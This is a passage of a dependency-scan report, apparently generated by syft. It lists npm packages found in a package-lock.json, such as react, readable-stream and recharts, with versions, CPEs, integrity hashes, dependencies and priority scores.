null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7d9cd0e4ae47337e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: raw-body 2.5.3' + title: raw-body 2.5.3 + description: 'Package discovered: raw-body 2.5.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 62bf6c85ca605f5a + name: raw-body + version: 2.5.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/raw-body@2.5.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz + integrity: sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA== + dependencies: + bytes: ~3.1.2 + http-errors: ~2.0.1 + iconv-lite: ~0.4.24 + unpipe: ~1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aa3b52d55574a475 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react 18.3.1' + title: react 18.3.1 + description: 'Package discovered: react 18.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 405f6eb700866b5f + name: react + version: 18.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react@18.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react/-/react-18.3.1.tgz + integrity: sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ== + dependencies: + loose-envify: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 36e9f0b5d3cd995c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react-dom 18.3.1' + title: react-dom 18.3.1 + description: 'Package discovered: react-dom 18.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 98bcef2cdcc9941a + name: react-dom + version: 18.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react-dom@18.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz + integrity: sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw== + dependencies: + loose-envify: ^1.1.0 + scheduler: ^0.23.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 19cfc2419956329b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react-is 16.13.1' + title: react-is 16.13.1 + description: 'Package discovered: react-is 16.13.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0db53ea4a0e10790 + name: react-is + version: 16.13.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react-is@16.13.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz + integrity: sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 320c91417fe22e47 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react-is 18.3.1' + title: react-is 18.3.1 + description: 'Package discovered: react-is 18.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 756017d5bfb89c54 + name: react-is + version: 18.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react-is@18.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz + integrity: sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e00babcb3a543f4c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react-promise-suspense 0.3.4' + title: react-promise-suspense 0.3.4 + description: 'Package discovered: react-promise-suspense 0.3.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 74a57b2250b339b3 + name: react-promise-suspense + version: 0.3.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react-promise-suspense@0.3.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz + integrity: sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ== + dependencies: + fast-deep-equal: ^2.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 45e27e6a5bb4b37b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react-smooth 4.0.4' + title: react-smooth 4.0.4 + description: 'Package discovered: react-smooth 4.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 646f82a1b8ded3b2 + name: react-smooth + version: 4.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react-smooth@4.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz + integrity: sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q== + dependencies: + fast-equals: ^5.0.1 + prop-types: ^15.8.1 + react-transition-group: ^4.4.5 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8e8ac167acac7b76 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: react-transition-group 4.4.5' + title: react-transition-group 4.4.5 + description: 'Package discovered: react-transition-group 4.4.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 15c7effc6183b848 + name: react-transition-group + version: 4.4.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/react-transition-group@4.4.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz + integrity: sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g== + dependencies: + '@babel/runtime': ^7.5.5 + dom-helpers: ^5.0.1 + loose-envify: ^1.4.0 + prop-types: ^15.6.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0cce3cd1fd3c13cf + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: read-cache 1.0.0' + title: read-cache 1.0.0 + description: 'Package discovered: read-cache 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5f64d7de79050a02 + name: read-cache + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/read-cache@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz + integrity: sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA== + dependencies: + pify: ^2.3.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c7ae55737c4393af + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: readable-stream 2.3.8' + title: readable-stream 2.3.8 + description: 'Package discovered: readable-stream 2.3.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: deca1a198ab80d23 + name: readable-stream + version: 2.3.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/readable-stream@2.3.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz + integrity: sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA== + dependencies: + core-util-is: ~1.0.0 + inherits: ~2.0.3 + isarray: ~1.0.0 + process-nextick-args: ~2.0.0 + safe-buffer: ~5.1.1 + string_decoder: ~1.1.1 + util-deprecate: ~1.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 303fe49ee8d1f69a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: readable-stream 3.6.2' + title: readable-stream 3.6.2 + description: 'Package discovered: readable-stream 3.6.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 066e44c97461677f + name: readable-stream + version: 3.6.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/readable-stream@3.6.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz + integrity: sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA== + dependencies: + inherits: ^2.0.3 + string_decoder: ^1.1.1 + util-deprecate: ^1.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9230ea38673dd70b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: readdirp 3.6.0' + title: readdirp 3.6.0 + description: 'Package discovered: readdirp 3.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: beb5f9a5d33de00e + name: readdirp + version: 3.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/readdirp@3.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz + integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA== + dependencies: + picomatch: ^2.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ec316d1c56cfd200 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: recharts 2.15.4' + title: recharts 2.15.4 + description: 'Package discovered: recharts 2.15.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 98e64f0b2bbef0ce + name: recharts + version: 2.15.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/recharts@2.15.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz + integrity: sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw== + dependencies: + clsx: ^2.0.0 + eventemitter3: ^4.0.1 + lodash: ^4.17.21 + react-is: ^18.3.1 + react-smooth: ^4.0.4 + recharts-scale: ^0.4.4 + tiny-invariant: ^1.3.1 + victory-vendor: ^36.6.8 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 249969671e277623 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: recharts-scale 0.4.5' + title: recharts-scale 0.4.5 + description: 'Package discovered: recharts-scale 0.4.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b982e93a08325fbd + name: recharts-scale + version: 0.4.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/recharts-scale@0.4.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz + integrity: sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w== + dependencies: + decimal.js-light: ^2.4.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0c07927a54487fe7 + ruleId: 